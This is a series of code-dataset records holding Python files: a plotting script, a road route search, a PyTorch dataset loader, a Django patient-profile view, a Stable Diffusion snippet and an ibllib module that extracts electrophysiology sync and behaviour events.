color=COLORS[policy_name])\n\n avg = np.average(errors)\n if metric in ('norm_mae', 'norm_rmse'):\n avg = avg * 100\n\n agg_errors.append(avg)\n\n if encoding == 'standard':\n labels.append(name)\n else:\n labels.append(policy_name)\n\n min_error = np.argmin(agg_errors)\n print(' & '.join(labels))\n print(' & '.join((('{0:.5f}'.format(x) if i != min_error else '\\\\textbf{{{0:.5f}}}'.format(x)) for i, x in enumerate(agg_errors))))\n\n ax.set_xlabel('Energy Budget (Average mJ / Seq)', fontsize=AXIS_FONT)\n ax.set_ylabel(metric.upper(), fontsize=AXIS_FONT)\n ax.set_title('Sampling Error on the {0} Dataset'.format(dataset_label(dataset_name)), fontsize=TITLE_FONT)\n\n ax.legend(fontsize=LEGEND_FONT)\n\n if output_file is None:\n plt.show()\n else:\n plt.savefig(output_file, bbox_inches='tight', transparent=True)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--folder', type=str, required=True, help='The name of the folder holding the experiment logs.')\n parser.add_argument('--dataset', type=str, required=True, help='The dataset name.')\n parser.add_argument('--metric', type=str, choices=['mae', 'rmse'], required=True, help='The error metric to use.')\n 
parser.add_argument('--output-file', type=str, help='An optional output file in which to save the plot.')\n    parser.add_argument('--is-group-comp', action='store_true', help='Whether to use variants of AGE [default: no].')\n    parser.add_argument('--include-skip-rnn', action='store_true', help='Whether to include Skip RNNs [default: no].')\n    args = parser.parse_args()\n\n    extract_fn = partial(extract_results, field=args.metric, aggregate_mode=None)\n    policy_folders = list(iterate_policy_folders([args.folder], dataset=args.dataset))\n\n    sim_results = {name: res for name, res in map(extract_fn, policy_folders)}\n    plot(sim_results, output_file=args.output_file, dataset_name=args.dataset, metric=args.metric, is_group_comp=args.is_group_comp, include_skip_rnn=args.include_skip_rnn)\n","sub_path":"adaptiveleak/analysis/plot_error.py","file_name":"plot_error.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423884685","text":"#!/usr/local/bin/python3\n\n# put your routing program here!\n\nfrom sys import argv\n\nfrom pprint import pprint\n\nfrom utils import *\n\nsegments_file = \"road-segments.txt\"\ngps_file = \"city-gps.txt\"\ngraph = make_connectivity_graph(segments_file)\ngps_graph = make_gps_graph(gps_file)\npopulate_coords_for_empty(graph, gps_graph)\n\ncity1 = argv[1]\ncity2 = argv[2]\nmethod = argv[3].lower()\n\ndef make_segment_search_move(fringe, end_city=None, gps_graph=None):\n    if end_city is None:\n        fringe_item = fringe[0]\n        next_city = fringe_item['next_cities'].pop(0)\n        connected_cities = get_connected_cities(graph, next_city)\n        fringe.append(\n            create_fringe_object(\n                fringe_item['path']+(next_city,),\n                connected_cities,\n                0\n            )\n        )\n        if not fringe_item['next_cities']:\n            fringe.pop(0)\n        return next_city\n\n    #this uses gps heuristic\n    fringe_item = fringe[0]\n    current_city = fringe_item['path'][-1]\n    base_slope = get_slope(gps_graph,current_city, end_city)\n    move_index = 0\n    min_diff = 99999\n    for index, city in enumerate(fringe_item['next_cities']):\n        current_diff = base_slope - get_slope(gps_graph, city, end_city)\n        if current_diff < min_diff:\n            min_diff = current_diff\n            move_index = index\n\n    next_city = fringe_item['next_cities'].pop(move_index)  # take the best-scoring candidate found above\n\n    connected_cities = get_connected_cities(graph, next_city)\n    fringe.append(\n        create_fringe_object(\n            fringe_item['path']+(next_city,),\n            connected_cities,\n            0\n        )\n    )\n\n    return next_city\n\n\ndef segment_seach(graph, start_city_name, end_city_name):\n\n    connected_cities = get_connected_cities(graph, start_city_name)\n    fringe = [\n        create_fringe_object(\n            (start_city_name,),\n            connected_cities,\n            0\n        ),\n    ]\n    continue_traversal = True if connected_cities else False\n    solution_found = False\n    moves = 0\n\n    while continue_traversal:\n        while not fringe[0]['next_cities']:\n            fringe.pop(0)\n        if fringe and fringe[0]['next_cities']:\n            next_city = make_segment_search_move(\n                fringe, end_city_name, gps_graph\n            )\n            moves += 1\n            if next_city == end_city_name:\n                continue_traversal = False\n                solution_found = True\n        else:\n            continue_traversal = False\n    # print(\"moves: \", moves)\n\n    if solution_found:\n        return fringe[-1]\n\ndef get_city_distance_from_graph(\n    fringe_item, current_city_index, next_city_index\n):\n    current_city_name = fringe_item['path'][current_city_index]\n    next_city_name = fringe_item['next_cities'][next_city_index]\n    dist = fringe_item['distance'] + graph[current_city_name][\n        next_city_name\n    ]['distance']\n    return dist\n\ndef 
get_speed(fringe_item, current_city_index, next_city_index):\n    current_city_name = fringe_item['path'][current_city_index]\n    next_city_name = fringe_item['next_cities'][next_city_index]\n    segment = graph[current_city_name][\n        next_city_name\n    ]\n    dist = fringe_item['distance'] + (\n        segment['distance'] / float(segment['speed_limit'])\n    )\n    return dist\n\ndef best_milage(fringe_item, current_city_index, next_city_index):\n    current_city_name = fringe_item['path'][current_city_index]\n    next_city_name = fringe_item['next_cities'][next_city_index]\n    segment = graph[current_city_name][\n        next_city_name\n    ]\n    mil = get_milage(float(segment['speed_limit']))\n    dist = fringe_item['distance'] + mil\n    return dist\n\ndef traverse(fringe, end_city_name, func_to_use, gps_graph):\n    weight1 = 8\n    weight2 = 2\n    if not fringe:\n        #no moves remaining, returning\n        return None, False\n    fringe_item = None\n\n    pop_list = []\n    for index, fringe_item in enumerate(fringe):\n        if not fringe_item['next_cities']:\n            pop_list.append(index)\n        if fringe_item['next_cities']:\n            best_move = create_next_move_obj(\n                index,(\n                    func_to_use(\n                        fringe_item, -1, 0\n                    ) * weight1 + get_slope(\n                        gps_graph,\n                        fringe_item['path'][-1],\n                        fringe_item['next_cities'][0],\n                    ) * weight2\n                )\n                , 0\n            )\n\n    # pop from the back so the earlier indices in pop_list stay valid\n    for pop in reversed(pop_list):\n        fringe.pop(pop)\n\n    for fringe_item_index, fringe_item in enumerate(fringe):\n        if end_city_name in fringe_item['next_cities']:\n            end_city_index = fringe_item['next_cities'].index(end_city_name)\n\n            best_move = create_next_move_obj(\n                fringe_item_index,\n                (func_to_use(\n                    fringe_item, -1, end_city_index\n                ) * weight1 + get_slope(\n                    gps_graph,\n                    fringe_item['path'][-1],\n                    fringe_item['next_cities'][end_city_index],\n                ) * weight2\n                ),\n                end_city_index\n            )\n\n            #return reached true if final city reached\n            return best_move, True\n\n        for city_index, city in enumerate(fringe_item['next_cities']):\n            next_move = create_next_move_obj(\n                fringe_item_index,\n                (func_to_use(\n                    fringe_item, -1, city_index\n                ) * weight1 + get_slope(\n                    gps_graph,\n                    fringe_item['path'][-1],\n                    fringe_item['next_cities'][city_index],\n                ) * weight2\n                ),\n                city_index\n            )\n            if (next_move['distance'] < best_move['distance']\n                # and fringe_item['next_moves']\n            ):\n                best_move = next_move\n    #return reached False as final city not reached\n    return best_move, False\n\ndef make_move_on_distance(fringe, next_move):\n    fringe_item_index = next_move['fringe_item_index']\n    distance = next_move['distance']\n    next_move_index = next_move['next_move_index']\n\n    fringe_item = fringe[fringe_item_index]\n    next_city = fringe_item['next_cities'][next_move_index]\n    connected_cities = get_connected_cities(graph, next_city)\n    next_fringe_item = create_fringe_object(\n        fringe_item['path']+(next_city,), connected_cities, distance\n    )\n    fringe.append(next_fringe_item)\n    fringe_item['next_cities'].pop(next_move_index)\n    if not fringe_item['next_cities']:\n        fringe.pop(fringe_item_index)\n    return next_fringe_item\n\n\n\ndef road_trip(graph, start_city_name, end_city_name, heuristic, gps_graph):\n    if (end_city_name not in graph.keys()\n        or start_city_name not in graph.keys()):\n        return\n    connected_cities = get_connected_cities(graph, start_city_name)\n    fringe = [\n        create_fringe_object(\n            (start_city_name,),\n            connected_cities,\n            0\n        ),\n    ]\n    continue_traversal = True if connected_cities else False\n    solution_found = False\n    moves = 0\n\n    while continue_traversal:\n\n        if heuristic == 1:\n            #distance\n            fn_to_use = 
get_speed\n        elif heuristic == 3:\n            #mpg\n            fn_to_use = best_milage\n\n\n        next_move, reached = traverse(\n            fringe, end_city_name, fn_to_use, gps_graph\n        )\n        if not next_move:\n            continue_traversal = False\n            return\n        #TODO remove fringe items when no next move\n        #DO above in make move case\n        solution = make_move_on_distance(fringe, next_move)\n        if reached:\n            continue_traversal = False\n            solution_found = True\n        moves+=1\n\n        # if moves%500==0:\n        #     print(\"moves: \", moves)\n    # print(\"moves: \", moves)\n    if solution_found:\n        return solution\n\nif method == 'segments':\n    get_formatted_output_from_frige_item(\n        graph, segment_seach(graph, city1, city2)\n    )\nelif method == 'distance':\n    get_formatted_output_from_frige_item(\n        graph, road_trip(graph, city1, city2, 1, gps_graph)\n    )\nelif method == 'time':\n    get_formatted_output_from_frige_item(\n        graph, road_trip(graph, city1, city2, 2, gps_graph)\n    )\nelif method == 'mpg':\n    get_formatted_output_from_frige_item(\n        graph, road_trip(graph, city1, city2, 3, gps_graph)\n    )\n","sub_path":"Implementation of A-star algorithm with heuristics, Knapsack variant using DP and Branch and Bound Technique/part2/route.py","file_name":"route.py","file_ext":"py","file_size_in_byte":8586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"44131110","text":"import glob\nimport torchvision.transforms as transforms\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom PIL import Image\nimport random\n\n\nclass CustomDataset(Dataset):\n    def __init__(self, image_dir, label_dir, img_format, lab_format, task='train', size = (256, 512)):\n        images = glob.glob(r'./data/{}/{}/*/*{}'.format(image_dir, task, img_format))\n        labels = glob.glob(r'./data/{}/{}/*/*{}'.format(label_dir, task, lab_format))\n        images.sort()\n        labels.sort()\n        self.data = list(zip(images, labels))\n        self.transforms1 = transforms.Compose([transforms.Resize(size, Image.BILINEAR),\n                                      transforms.ToTensor(),\n                                      transforms.Normalize((.485, .456, .406), (.229, .224, .225)),])\n        self.transforms2 = transforms.Resize(size, Image.NEAREST)\n\n    def __getitem__(self, index):\n        image_path, label_path = self.data[index]\n        image = Image.open(image_path)\n        label = Image.open(label_path)\n        image, label = self.__randomtransform__(image, label)\n        image = self.transforms1(image)\n        label = torch.LongTensor(np.array(self.transforms2(label)).astype('int32'))\n        return image, label, image_path.rsplit('/',1)[1]\n\n    def __len__(self):\n        return len(self.data)\n\n    def __randomtransform__(self, img, label):\n        if random.random()<0.5:\n            img = img.transpose(Image.FLIP_LEFT_RIGHT)\n            label = label.transpose(Image.FLIP_LEFT_RIGHT)\n        if random.random()<0.5:\n            img = img.transpose(Image.FLIP_TOP_BOTTOM)\n            label = label.transpose(Image.FLIP_TOP_BOTTOM)  # flip the label the same way as the image\n        return img, label\n\nclass TestDataset(Dataset):\n    def __init__(self, image_dir, img_format, size = (256, 512)):\n        self.images = glob.glob(r'./data/{}/*{}'.format(image_dir, img_format))\n        self.transforms1 = transforms.Compose([transforms.Resize(size, Image.BILINEAR),\n                                      transforms.ToTensor(),\n                                      transforms.Normalize((.485, .456, .406), (.229, .224, .225)),])\n\n    def __getitem__(self, index):\n        image_path = self.images[index]\n        image = Image.open(image_path)\n        image = self.__randomtransform__(image)\n        image = self.transforms1(image)\n        return image, image_path.rsplit('/',1)[1]\n\n    def __len__(self):\n        return len(self.images)\n\n    def __randomtransform__(self, img):\n        if random.random()<0.5:\n            img = 
img.transpose(Image.FLIP_LEFT_RIGHT)\n        if random.random()<0.5:\n            img = img.transpose(Image.FLIP_TOP_BOTTOM)\n        return img","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"69326479","text":"from functions.inputs import get_input\n\ndef calculo_potencia(base = 2, exponente = 0, limite = 1):\n    resultado = 0\n\n    while resultado < limite:\n        resultado = base ** exponente\n        print(f\"{base} raised to the power {exponente} equals: {resultado}\")\n        exponente += 1\n\n\ndef run():\n    LIMITE = get_input(int, \"Maximum number?: \", \"a valid number\")\n    calculo_potencia(limite=LIMITE)\n\n\nif __name__ == '__main__':\n    run()","sub_path":"bucle.py","file_name":"bucle.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"103899366","text":"from diffusers import StableDiffusionPipeline\r\nfrom huggingface_hub import notebook_login\r\nnotebook_login()\r\n\r\n\r\nexperimental_pipe = StableDiffusionPipeline.from_pretrained(\"CompVis/stable-diffusion-v1-4\", revision=\"fp16\", use_auth_token=True)\r\ndescription_1 = \"a photograph of an horse on moon\"\r\nimage_1 = experimental_pipe(description_1).images[0]\r\nimage_1\r\nimage_1.save(\"description_1_based_image.png\")\r\n\r\n","sub_path":"AI & ML/Image_generation_from_caption.py","file_name":"Image_generation_from_caption.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"554087105","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\nfrom hms.models import Person\nfrom .models import Patient\nfrom doctor.models import Prescription\n\n\ndef profile(request):\n    user = request.user\n    user = User.objects.get(username=user)\n    person = Person.objects.get(user=user)\n    users = {\n        'firstname': request.user.first_name,\n        'lastname': request.user.last_name,\n        'email': request.user.email,\n    }\n    print(users)\n    if request.method == 'POST':\n        phone = request.POST['phone']\n        gender = request.POST['gender']\n        address = request.POST['address']\n        age = request.POST['age']\n        \n        if phone and gender and address and age:\n            if Patient.objects.filter(person=person).exists():\n                patient = Patient.objects.get(person=person)\n                patient_val = Patient.objects.filter(person=person).update(person=person, phone=phone, gender=gender, address=address, age=age)\n                return render(request, 'patient/profile.html', {'patient': patient, 'users': users, 'person': person})\n\n            obj = Patient.objects.create(person=person, phone=phone, gender=gender, age=age, address=address)\n            obj.save()\n\n            # 'obj' is the record just created; no 'patient' variable exists on this path\n            return render(request, 'patient/profile.html', {'patient': obj, 'users': users, 'person': person})\n        else:\n            print(\"Error occurred: \",phone,gender,address,age)\n    patient = Patient.objects.filter(person=person)\n    if Patient.objects.filter(person=person).exists():\n        patient = Patient.objects.filter(person=person)[0]\n        return render(request, 'patient/profile.html', {'patient': patient, 'users': users, 'person': person})\n    else:\n        return render(request, 'patient/profile.html', {'patient': None, 'users': users, 'person': person})\n\n\ndef medsHistory(request):\n    person = Person.objects.get(user = User.objects.get(username=request.user))\n    patient = Patient.objects.get(person=person)\n    prescriptions = 
Prescription.objects.filter(patient=patient).order_by('date')\n    return render(request, 'patient/medicalHistory.html', {\n        'person': person, 'prescriptions': prescriptions\n    })\n\n\n","sub_path":"patient/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"72505990","text":"import logging\nimport tempfile\nfrom pathlib import Path\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport ibllib.plots as plots\nimport ibllib.behaviour.wheel as whl\nimport ibllib.io\nimport ibllib.dsp as dsp\nimport alf.io\n\n_logger = logging.getLogger('ibllib')\n\nSYNC_BATCH_SIZE_SAMPLES = 2 ** 18  # number of samples to read at once in bin file for sync\nWHEEL_RADIUS_CM = 3.1\nWHEEL_TICKS = 1024\nDEBUG_PLOTS = False\n# this is the mapping of synchronisation pulses coming out of the FPGA\nAUXES = [\n    (0, None),\n    (1, None),\n    (2, 'left_camera'),\n    (3, 'right_camera'),\n    (4, 'body_camera'),\n    (5, None),\n    (6, None),\n    (7, 'bpod'),\n    (8, None),\n    (9, None),\n    (10, None),\n    (11, None),\n    (12, 'frame2ttl'),\n    (13, 'rotary_encoder_0'),\n    (14, 'rotary_encoder_1'),\n    (15, 'audio'),\n]\nSYNC_CHANNEL_MAP = {}\nfor aux in AUXES:\n    if aux[1]:\n        SYNC_CHANNEL_MAP[aux[1]] = aux[0]\n\n\ndef _sync_to_alf(raw_ephys_apfile, output_path=None, save=False):\n    \"\"\"\n    Extracts sync.times, sync.channels and sync.polarities from binary ephys dataset\n\n    :param raw_ephys_apfile: bin file containing ephys data, or a spikeglx Reader\n    :param output_path: output directory\n    :return:\n    \"\"\"\n    if not output_path:\n        # a named temporary path is needed: the file is re-opened by name below\n        # and unlinked once its contents have been read back\n        file_ftcp = Path(tempfile.mkdtemp()) / 'fronts_times_channel_polarity.bin'\n    else:\n        file_ftcp = Path(output_path) / 'fronts_times_channel_polarity.bin'\n    if isinstance(raw_ephys_apfile, ibllib.io.spikeglx.Reader):\n        sr = raw_ephys_apfile\n    else:\n        sr = ibllib.io.spikeglx.Reader(raw_ephys_apfile)\n    # loop over chunks of the raw ephys file\n    wg = dsp.WindowGenerator(sr.ns, SYNC_BATCH_SIZE_SAMPLES, overlap=1)\n    fid_ftcp = open(file_ftcp, 'wb')\n    for sl in wg.slice:\n        ss = sr.read_sync(sl)\n        ind, fronts = dsp.fronts(ss, axis=0)\n        sav = np.c_[(ind[0, :] + sl.start) / sr.fs, ind[1, :], fronts.astype(np.double)]\n        sav.tofile(fid_ftcp)\n        # print progress\n        wg.print_progress()\n    # close temp file, read from it and delete\n    fid_ftcp.close()\n    tim_chan_pol = np.fromfile(str(file_ftcp))\n    tim_chan_pol = tim_chan_pol.reshape((int(tim_chan_pol.size / 3), 3))\n    file_ftcp.unlink()\n    sync = {'times': tim_chan_pol[:, 0],\n            'channels': tim_chan_pol[:, 1],\n            'polarities': tim_chan_pol[:, 2]}\n    if save:\n        alf.io.save_object_npy(output_path, sync, '_spikeglx_sync')\n    return sync\n\n\ndef _bpod_events_extraction(bpod_t, bpod_fronts):\n    \"\"\"\n    From detected fronts on the bpod sync traces, outputs the synchronisation events\n    related to trial start and valve opening\n    :param bpod_t: numpy vector containing times of fronts\n    :param bpod_fronts: numpy vector containing polarity of fronts (1 rise, -1 fall)\n    :return: numpy arrays of times t_trial_start, t_valve_open and t_iti_in\n    \"\"\"\n    # make sure that there are no 2 consecutive fall or consecutive rise events\n    assert(np.all(np.abs(np.diff(bpod_fronts)) == 2))\n    # make sure that the first event is a rise\n    assert(bpod_fronts[0] == 1)\n    # take only even time differences: ie. 
from rising to falling fronts\n dt = np.diff(bpod_t)[::2]\n # detect start trials event assuming length is 0.1 ms except the first trial\n i_trial_start = np.r_[0, np.where(dt <= 1.66e-4)[0] * 2]\n t_trial_start = bpod_t[i_trial_start]\n # # the first trial we detect the first falling edge to which we subtract 0.1ms\n # t_trial_start[0] -= 1e-4\n # the last trial is a dud and should be removed\n t_trial_start = t_trial_start[:-1]\n # valve open events are between 50ms to 300 ms\n i_valve_open = np.where(np.logical_and(dt > 1.66e-4, dt < 0.4))[0] * 2\n i_valve_open = np.delete(i_valve_open, np.where(i_valve_open < 2))\n t_valve_open = bpod_t[i_valve_open]\n # ITI events are above 400 ms\n i_iti_in = np.where(dt > 0.4)[0] * 2\n i_iti_in = np.delete(i_iti_in, np.where(i_valve_open < 2))\n i_iti_in = bpod_t[i_iti_in]\n # # some debug plots when needed\n # import matplotlib.pyplot as plt\n # import ibllib.plots as plots\n # plt.figure()\n # plots.squares(bpod_t, bpod_fronts)\n # plots.vertical_lines(t_valve_open, ymin=-0.2, ymax=1.2, linewidth=0.5, color='g')\n # plots.vertical_lines(t_trial_start, ymin=-0.2, ymax=1.2, linewidth=0.5, color='r')\n return t_trial_start, t_valve_open, i_iti_in\n\n\ndef _rotary_encoder_positions_from_fronts(ta, pa, tb, pb):\n \"\"\"\n Extracts the rotary encoder absolute position (cm) as function of time from fronts detected\n on the 2 channels\n\n :param ta: time of fronts on channel A\n :param pa: polarity of fronts on channel A\n :param tb: time of fronts on channel B\n :param pb: polarity of fronts on channel B\n :return: indices vector (ta) and position vector\n \"\"\"\n p = pb[np.searchsorted(tb, ta) - 1] * pa\n p = np.cumsum(p) / WHEEL_TICKS * np.pi * WHEEL_RADIUS_CM\n return ta, p\n\n\ndef _rotary_encoder_positions_from_gray_code(channela, channelb):\n \"\"\"\n Extracts the rotary encoder absolute position (cm) as function of time from digital recording\n of the 2 channels.\n\n Rotary Encoder implements X1 encoding: http://www.ni.com/tutorial/7109/en/\n rising A & B high = +1\n rising A & B low = -1\n falling A & B high = -1\n falling A & B low = +1\n\n :param channelA: Vector of rotary encoder digital recording channel A\n :type channelA: numpy array\n :param channelB: Vector of rotary encoder digital recording channel B\n :type channelB: numpy array\n :return: indices vector and position vector\n \"\"\"\n # detect rising and falling fronts\n t, fronts = dsp.fronts(channela)\n # apply X1 logic to get positions in ticks\n p = (channelb[t] * 2 - 1) * fronts\n # convert position in cm\n p = np.cumsum(p) / WHEEL_TICKS * np.pi * WHEEL_RADIUS_CM\n return t, p\n\n\ndef _audio_events_extraction(audio_t, audio_fronts):\n \"\"\"\n From detected fronts on the audio sync traces, outputs the synchronisation events\n related to tone in\n\n :param audio_t: numpy vector containing times of fronts\n :param audio_fronts: numpy vector containing polarity of fronts (1 rise, -1 fall)\n :return: numpy arrays t_ready_tone_in, t_error_tone_in\n \"\"\"\n # make sure that there are no 2 consecutive fall or consecutive rise events\n assert(np.all(np.abs(np.diff(audio_fronts)) == 2))\n # make sure that the first event is a rise\n assert(audio_fronts[0] == 1)\n # take only even time differences: ie. 
from rising to falling fronts\n dt = np.diff(audio_t)[::2]\n # detect ready tone by length below 110 ms\n i_ready_tone_in = np.r_[1, np.where(dt <= 0.11)[0] * 2]\n t_ready_tone_in = audio_t[i_ready_tone_in]\n # error tones are events lasting from 400ms to 600ms\n i_error_tone_in = np.where(np.logical_and(0.4 < dt, dt < 0.6))[0] * 2\n t_error_tone_in = audio_t[i_error_tone_in]\n return t_ready_tone_in, t_error_tone_in\n\n\ndef _assign_events_to_trial(t_trial_start, t_event, take='last'):\n \"\"\"\n Assign events to a trial given trial start times and event times.\n\n Trials without an event\n result in nan value in output time vector.\n The output has a consistent size with t_trial_start and ready to output to alf.\n\n :param t_trial_start: numpy vector of trial start times\n :param t_event: numpy vector of event times to assign to trials\n :param take: 'last' or 'first' (optional, default 'last'): index to take in case of duplicates\n :return: numpy array of event times with the same shape of trial start.\n \"\"\"\n # make sure the events are sorted\n try:\n assert(np.all(np.diff(t_trial_start) >= 0))\n except AssertionError:\n raise ValueError('Trial starts vector not sorted')\n try:\n assert(np.all(np.diff(t_event) >= 0))\n except AssertionError:\n raise ValueError('Events vector is not sorted')\n # remove events that happened before the first trial start\n t_event = t_event[t_event >= t_trial_start[0]]\n ind = np.searchsorted(t_trial_start, t_event) - 1\n t_event_nans = np.zeros_like(t_trial_start) * np.nan\n # select first or last element matching each trial start\n if take == 'last':\n iall, iu = np.unique(np.flip(ind), return_index=True)\n t_event_nans[iall] = t_event[- (iu - ind.size + 1)]\n elif take == 'first':\n iall, iu = np.unique(ind, return_index=True)\n t_event_nans[iall] = t_event[iu]\n\n return t_event_nans\n\n\ndef _get_sync_fronts(sync, channel_nb):\n return {'times': sync['times'][sync['channels'] == channel_nb],\n 'polarities': sync['polarities'][sync['channels'] == channel_nb]}\n\n\ndef extract_wheel_sync(sync, output_path=None, save=False, chmap=SYNC_CHANNEL_MAP):\n \"\"\"\n Extract wheel positions and times from sync fronts dictionary for all 16 chans\n\n :param sync: dictionary 'times', 'polarities' of fronts detected on sync trace\n :param output_path: where to save the data\n :param save: True/False\n :param chmap: dictionary containing channel indices. 
Default to constant.\n chmap = {'rotary_encoder_0': 13, 'rotary_encoder_1': 14}\n :return: dictionary containing wheel data, 'wheel_ts', 're_ts'\n \"\"\"\n wheel = {}\n channela = _get_sync_fronts(sync, chmap['rotary_encoder_0'])\n channelb = _get_sync_fronts(sync, chmap['rotary_encoder_1'])\n wheel['re_ts'], wheel['re_pos'] = _rotary_encoder_positions_from_fronts(\n channela['times'], channela['polarities'], channelb['times'], channelb['polarities'])\n if save and output_path:\n output_path = Path(output_path)\n # last phase of the process is to save the alf data-files\n np.save(output_path / '_ibl_wheel.position.npy', wheel['re_pos'])\n np.save(output_path / '_ibl_wheel.times.npy', wheel['re_ts'])\n np.save(output_path / '_ibl_wheel.velocity.npy',\n whl.velocity(wheel['re_ts'], wheel['re_pos']))\n return wheel\n\n\ndef extract_behaviour_sync(sync, output_path=None, save=False, chmap=SYNC_CHANNEL_MAP):\n \"\"\"\n Extract wheel positions and times from sync fronts dictionary\n\n :param sync: dictionary 'times', 'polarities' of fronts detected on sync trace for all 16 chans\n :param output_path: where to save the data\n :param save: True/False\n :param chmap: dictionary containing channel index. Default to constant.\n chmap = {'bpod': 7, 'frame2ttl': 12, 'audio': 15}\n :return: trials dictionary\n \"\"\"\n bpod = _get_sync_fronts(sync, chmap['bpod'])\n frame2ttl = _get_sync_fronts(sync, chmap['frame2ttl'])\n audio = _get_sync_fronts(sync, chmap['audio'])\n # extract events from the fronts for each trace\n t_trial_start, t_valve_open, t_iti_in = _bpod_events_extraction(\n bpod['times'], bpod['polarities'])\n t_ready_tone_in, t_error_tone_in = _audio_events_extraction(\n audio['times'], audio['polarities'])\n # stim off time is the first frame2ttl rise/fall after the trial start\n # does not apply for 1st trial\n ind = np.searchsorted(frame2ttl['times'], t_trial_start[1:], side='left')\n t_stim_off = frame2ttl['times'][ind]\n # the t_stim_off happens 100ms after trial start\n assert(np.all((t_trial_start[1:] - t_stim_off) > -0.1))\n t_stim_freeze = frame2ttl['times'][ind - 1]\n\n if DEBUG_PLOTS:\n plt.figure()\n ax = plt.gca()\n plots.squares(bpod['times'], bpod['polarities'] * 0.4 + 1,\n ax=ax, label='bpod=1', color='k')\n plots.squares(frame2ttl['times'], frame2ttl['polarities'] * 0.4 + 2,\n ax=ax, label='frame2ttl=2', color='k')\n plots.squares(audio['times'], audio['polarities'] * 0.4 + 3,\n ax=ax, label='audio=3', color='k')\n plots.vertical_lines(t_ready_tone_in, ymin=0, ymax=4,\n ax=ax, label='ready tone in', color='b', linewidth=0.5)\n plots.vertical_lines(t_trial_start, ymin=0, ymax=4,\n ax=ax, label='start_trial', color='m', linewidth=0.5)\n plots.vertical_lines(t_error_tone_in, ymin=0, ymax=4,\n ax=ax, label='error tone', color='r', linewidth=0.5)\n plots.vertical_lines(t_valve_open, ymin=0, ymax=4,\n ax=ax, label='valve open', color='g', linewidth=0.5)\n plots.vertical_lines(t_stim_freeze, ymin=0, ymax=4,\n ax=ax, label='stim freeze', color='y', linewidth=0.5)\n plots.vertical_lines(t_stim_off, ymin=0, ymax=4,\n ax=ax, label='stim off', color='c', linewidth=0.5)\n ax.legend()\n\n # stimOn_times: first fram2ttl change after trial start\n trials = {\n 'ready_tone_in': _assign_events_to_trial(t_trial_start, t_ready_tone_in),\n 'error_tone_in': _assign_events_to_trial(t_trial_start, t_error_tone_in),\n 'valve_open': _assign_events_to_trial(t_trial_start, t_valve_open),\n 'stim_freeze': _assign_events_to_trial(t_trial_start, t_stim_freeze),\n 'stimOn_times': 
_assign_events_to_trial(t_trial_start, frame2ttl['times'], take='first'),\n 'iti_in': _assign_events_to_trial(t_trial_start, t_iti_in)\n }\n # goCue_times corresponds to the tone_in event\n trials['goCue_times'] = trials['ready_tone_in']\n # response_times is TONE_IN to STIM freeze\n trials['response_times'] = trials['stim_freeze'] - trials['ready_tone_in']\n # feedback times are valve open on good trials and error tone in on error trials\n trials['feedback_times'] = trials['valve_open']\n ind_err = np.isnan(trials['valve_open'])\n trials['feedback_times'][ind_err] = trials['error_tone_in'][ind_err]\n # # # # this is specific to version 4\n trials['iti_in'] = trials['valve_open'] + 1.\n trials['iti_in'][ind_err] = trials['error_tone_in'][ind_err] + 2.\n trials['intervals'] = np.c_[t_trial_start, trials['iti_in']]\n # # # # end of specific to version 4\n if save and output_path:\n output_path = Path(output_path)\n np.save(output_path / '_ibl_trials.goCue_times.npy', trials['goCue_times'])\n np.save(output_path / '_ibl_trials.response_times.npy', trials['response_times'])\n np.save(output_path / '_ibl_trials.stimOn_times.npy', trials['stimOn_times'])\n np.save(output_path / '_ibl_trials.intervals.npy', trials['intervals'])\n np.save(output_path / '_ibl_trials.feedback_times.npy', trials['feedback_times'])\n return trials\n\n\ndef align_with_bpod(session_path):\n \"\"\"\n Reads in trials.intervals ALF dataset from bpod and fpga.\n Asserts consistency between datasets and compute the median time difference\n\n :param session_path:\n :return: dt: median time difference of trial start times (fpga - bpod)\n \"\"\"\n # check consistency\n output_path = Path(session_path) / 'alf'\n trials = alf.io.load_object(output_path, '_ibl_trials')\n assert(alf.io.check_dimensions(trials) == 0)\n dt = (np.diff(trials['intervalsBpod']) - np.diff(trials['intervals']))\n assert(np.all(np.abs(dt[np.invert(np.isnan(dt))]) < 5 * 1e-3))\n dt = trials['intervals'][:, 0] - trials['intervalsBpod'][:, 0]\n # plt.plot(np.diff(trials['intervalsBpod']), '*')\n # plt.plot(np.diff(trials['intervals']), '.')\n return np.median(dt)\n\n\ndef extract_all(session_path, save=False, version=None):\n \"\"\"\n Reads ephys binary file and extract sync, wheel and behaviour ALF files\n\n :param session_path: '/path/to/subject/yyyy-mm-dd/001'\n :param save: Bool, defaults to False\n :param version: bpod version, defaults to None\n :return: None\n \"\"\"\n session_path = Path(session_path)\n output_path = session_path / 'alf'\n raw_ephys_path = session_path / 'raw_ephys_data'\n if not output_path.exists():\n output_path.mkdir()\n\n ephys_files = list(raw_ephys_path.rglob('*.ap.bin'))\n if len(ephys_files) > 2:\n raise NotImplementedError(\"Multiple probes/files extraction not implemented. 
